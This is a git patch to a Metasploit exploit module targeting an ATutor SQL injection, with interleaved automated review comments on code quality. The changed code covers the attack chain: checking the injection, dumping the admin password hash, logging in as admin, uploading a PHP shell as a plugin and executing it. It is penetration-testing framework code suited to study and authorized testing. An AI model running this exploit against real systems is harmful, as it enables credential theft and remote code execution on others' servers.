From f55835cceb26e89a3e603b09e3af35f0ffa13dd7 Mon Sep 17 00:00:00 2001
From: wchen-r7
Date: Mon, 29 Feb 2016 18:39:52 -0600
Subject: [PATCH] Merge new code changes from mr_me

---
 modules/exploits/multi/http/atutor_sqli.rb | 70 +++++++++++++---------
 1 file changed, 43 insertions(+), 27 deletions(-)

diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb
index f3fc1f5216..f9b7f6fbd4 100644
--- a/modules/exploits/multi/http/atutor_sqli.rb
+++ b/modules/exploits/multi/http/atutor_sqli.rb
@@ -63,6 +63,22 @@ class Metasploit3 < Msf::Exploit::Remote
     super("#{peer} - #{msg}")
   end
 
+  def check
+    # the only way to test if the target is vuln
+    begin
+      test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
+    rescue Msf::Exploit::Failed => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    end
+
+    if test_injection(test_cookie)
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
   def push
     uri = normalize_uri(target_uri.path)
 
@@ -115,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def upload_shell(cookie)
     post_data = Rex::MIME::Message.new
     post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"")
-    post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"")
+    post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"")
     data = post_data.to_s
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"),
@@ -145,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # auth failed if we land here, bail
-    fail_with(Failure::NoAccess, "Upload did not work")
+    fail_with(Failure::Unknown, "Unable to upload php code")
     return false
   end
 
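Review bot: The `begin`/`rescue` in the new `check` method covers only the `login` call, so if `test_injection` (defined outside this hunk) signals failure through the same `Msf::Exploit::Failed` path, that exception escapes `check` instead of being mapped to a CheckCode; worth confirming, and if so widening the rescue to cover both calls. The closing `if`/`else` with two explicit returns can be one expression, `test_injection(test_cookie) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe`. The comment `# the only way to test if the target is vuln` does not tell the reader what the method needs; replace it with `# Requires USERNAME/PASSWORD: logs in, then runs test_injection; Unknown when login fails.`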
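Review bot: The new `add_part` value wraps a single method call in string interpolation, `"#{Rex::Text.rand_text_alpha_upper(4)}"`, which is redundant because `rand_text_alpha_upper` already returns a String; pass `Rex::Text.rand_text_alpha_upper(4)` directly. The body of `upload_shell` continues past the hunk.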
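Review bot: The replaced `fail_with` line now reports `Failure::Unknown` with the message `"Unable to upload php code"`, while the comment directly above it still reads `# auth failed if we land here, bail`, so the comment and the code disagree about why this path is reached. Either keep `Failure::NoAccess` if the cause really is authentication, or change the comment to match the new reason, e.g. `# response did not confirm the upload, bail`. The `return false` that follows is pre-existing context rather than part of this change, but it is unreachable if `fail_with` raises as it does in the framework, so it could go in a follow-up.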
@@ -275,19 +291,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
     if do_test
-      if do_true
-        result = perform_request("1=1", cookie)
-        if result =~ /There are \d entries./
-          return true
-        end
-      else not do_true
-        result = perform_request("1=2", cookie)
-        if not result =~ /There are \d entries./
-          return true
-        end
-      end
-    else not do_test and sql
-      return get_ascii_value(sql, cookie)
+      if do_true
+        result = perform_request("1=1", cookie)
+        if result =~ /There are \d entries./
+          return true
+        end
+      else not do_true
+        result = perform_request("1=2", cookie)
+        if not result =~ /There are \d entries./
+          return true
+        end
+      end
+    elsif not do_test and sql
+      return get_ascii_value(sql, cookie)
     end
   end
 
@@ -332,18 +348,18 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
     report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])
 
-    if test_injection(student_cookie)
-      print_good("Test injection working!")
-      print_status("Dumping username and password hash...")
-      credz = dump_the_hash(student_cookie)
-      print_good("Got the #{credz[0]} hash: #{credz[1]} !")
-      if credz
-        admin_cookie = login(credz[0], credz[1], true)
-        print_status("Logged in as #{credz[0]}, uploading shell...")
-        if upload_shell(admin_cookie)
-          print_good("Shell upload successful!")
-          exec_code
-        end
+    print_status("Dumping username and password hash...")
+    # we got admin hash now
+    credz = dump_the_hash(student_cookie)
+    print_good("Got the #{credz[0]} hash: #{credz[1]} !")
+    if credz
+      admin_cookie = login(credz[0], credz[1], true)
+      print_status("Logged in as #{credz[0]}, uploading shell...")
+      # install a plugin
+      if upload_shell(admin_cookie)
+        print_good("Shell upload successful!")
+        # boom
+        exec_code
       end
     end
   end
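Review bot: `else not do_true` on the inner branch is not a condition: Ruby parses it as a bare `else` followed by the expression statement `not do_true`, whose value is discarded, so the line reads like a guard but does nothing; write it as plain `else`. The outer branch was correctly changed to `elsif`, but `elsif not do_test and sql` mixes the keyword forms whose precedence differs from `!`/`&&`; `elsif !do_test && sql` says the same thing without the trap. When neither `return true` fires in the `do_test` branch the method falls off the end and yields `nil`, so a caller testing for `false` would not see it; an explicit `false` at the end of that branch would document the intended result. Apart from `else`→`elsif`, the removed and added lines carry identical text, so this hunk appears to be mostly a re-indentation.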
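Review bot: `print_good("Got the #{credz[0]} hash: #{credz[1]} !")` is evaluated before the `if credz` guard on the next line, so when `dump_the_hash` returns `nil` the interpolation raises `NoMethodError` on `nil[]` and the guard never runs; move the `print_good` inside the `if credz` block (or guard it with `credz &&`). The new comments `# we got admin hash now` and `# boom` add little for a reader; the second should state what `exec_code` actually does rather than an interjection, and the first can be dropped since the `print_status` line above already says what is happening. The enclosing method starts before this hunk.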